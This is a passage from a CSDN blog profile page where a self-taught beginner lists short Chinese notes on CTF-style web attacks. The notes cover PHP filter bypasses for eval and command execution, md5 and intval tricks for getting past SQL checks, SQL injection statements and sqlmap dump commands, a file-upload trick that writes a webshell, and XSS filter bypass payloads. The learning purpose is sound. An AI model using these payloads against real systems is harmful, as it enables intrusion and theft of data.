自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 收藏
  • 关注

原创 命令执行之构造数字

linux中$(())是可以做运算的,并且初始值为00取反后为-1只要把-1加起来最后结果再取反即可构造出想要的数字而且加号可以省略

2021-04-26 21:40:05 179

原创 命令执行无参数函数文件读取

apache环境下,getallheaders()函数可以返回http header。如果在http header中添加自定义代码,再将其取出即可执行。如果目标中间件不为apache,可以使用get_defined_vars()函数,它可以返回全局变量。

2021-03-21 23:18:19 170

原创 命令执行无字母数字绕过

if(!preg_match('/[a-z0-9]/is',$_GET['shell'])){ eval($_GET['shell']);}1.异或$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';$___=$$

2021-03-21 16:12:25 746

原创 md5(string,true)绕过

$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";md5(ffifdyop,true)='or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c原sql查询语句则变为select * from user where username ='admin' and password =''or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c'即可绕过.

2021-03-19 20:06:31 252

原创 SQL注入逗号绕过

limit 0,1 --> limit 1 offset 0substr(database(),2,1) --> substr(database() from 2 for 1)

2021-03-18 22:45:14 102

原创 md5加密相等绕过

在PHP中,利用”!=”或”==”来对哈希值进行比较时,PHP会把每一个以”0e”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么PHP将会认为他们相同,都是0。附几个md5加密后哈希值为"0e"开头的字符串:QNKCDZOTUFEPMC240610708314282422s878926199as155964671as214587387as214587387a...

2021-03-18 21:04:40 647

原创 命令执行绕过黑名单方法

# flag in config.phpif(!preg_match("/system|exec|highlight/i",preg_match($c)){ eval($c);}根据黑名单的不同,获取config.php的内容有以下几种方法:1.命令执行函数system()、passthru()、exec()、shell_exec()、popen()、proc_open()、pcntl_exec()?c=passthru('cat config.php');?c=highlight_file

2021-03-16 23:23:26 1464 1

原创 SQL注入intval()函数绕过黑名单方法

if(intval($id) > 999){ die("id error")};上面的源码想访问id=1000时有以下几种方法: id='1000'id="1000"id=125<<3(左移)id=680|320(按位或)id=992^8(按位异或)id=~~1000(取反)id=0x3e8(十六进制)id=0b1111101000(二进制)...

2021-03-16 16:43:49 1060

原创 文件上传绕过黑名单方法

利用PHP 和 Windows环境的叠加特性,以下符号在正则匹配时的相等性:双引号" = 点号.大于符号> = 问号?小于符号< = 星号*先上传一个名为1.php:.jpg的文件,上传成功后会生成1.php的空文件,大小为0KB。然后将文件名改为1.<或1.<<<或1.>>>或1.>><后再次上传,重写1.php文件内容,Webshell代码就会写入原来的1.php空文件中。...

2021-03-03 15:25:13 504 5

原创 XSS绕过正则

input = input.replace(/<([a-zA-Z])/g, ‘<_$1’)input = input.toUpperCase()匹配了所有<与字母的组合,但是ſ大写后为S,且其ascii值不与s相等,因此可以绕过。

2021-03-01 21:26:06 486

原创 绕过圆括号过滤实现XSS弹框

用data协议<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="></object>转自:jinglingshu的博客 » 绕过括号过滤实现XSS弹框

2021-03-01 20:31:28 448

原创 利用伪协议实现命令执行

php://filter/read=convert.base64-encode/resource=index.php

2021-02-28 16:13:23 267

原创 kali下sqlmap的指令

判断注入点:sqlmap -u url(目标地址)爆破数据库名:查看所有表名:sqlmap -u url --dbs查看当前表名:sqlmap -u url --current-db爆破数据表名:sqlmap -u url -D 数据库名 --tables爆破字段名:sqlmap -u url -D 数据库名 -T 表名 --columns爆破字段名下所有数据:sqlmap -u url -D 数据库名 -T 表名 -C 字段名 --dump爬虫:sqlmap -u url --crawl 深

2021-02-06 22:00:52 395

原创 SQL注入常用语句

靶场:封神台靶场第一章地址:https://hack.zkaq.cn/battle判断注入点数字型注入:id=1 and 1=1正常,id=1 and 1=2错误字符型注入:id=1’错误,id=1’ %23或id=1’ --+正常判断后得出该页面可以进行数字型注入判断字段数联合查询需要字段数相等,所以要先判断当前表的字段数输入order by 1和order by 2时都正常,输入order by 3时异常,说明当前表的字段数为2判断回显点由于网页只能显示表中一行的内容,要

2021-01-21 17:43:23 292

原创 Hello CSDN

Hello CSDN第一篇博客寄自己。在荒废了两年半的大学生活后的我终于开始钻研一门技能了,我选择了网络安全,专业是网络工程,也还算对口,但是课上学的东西大多却不沾边。在网络安全方面算个小白吧,自学了大概一个礼拜左右,过程的确艰苦,连一个能问的人都没有,只能不停地百度、谷歌,好在也弄懂了一些知识。以后陆续更新一些自己一点一滴的成果,把这些脚印记录下来,同时也送给想要入门网络安全的你们,愿共勉。...

2021-01-14 22:44:17 966 3

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除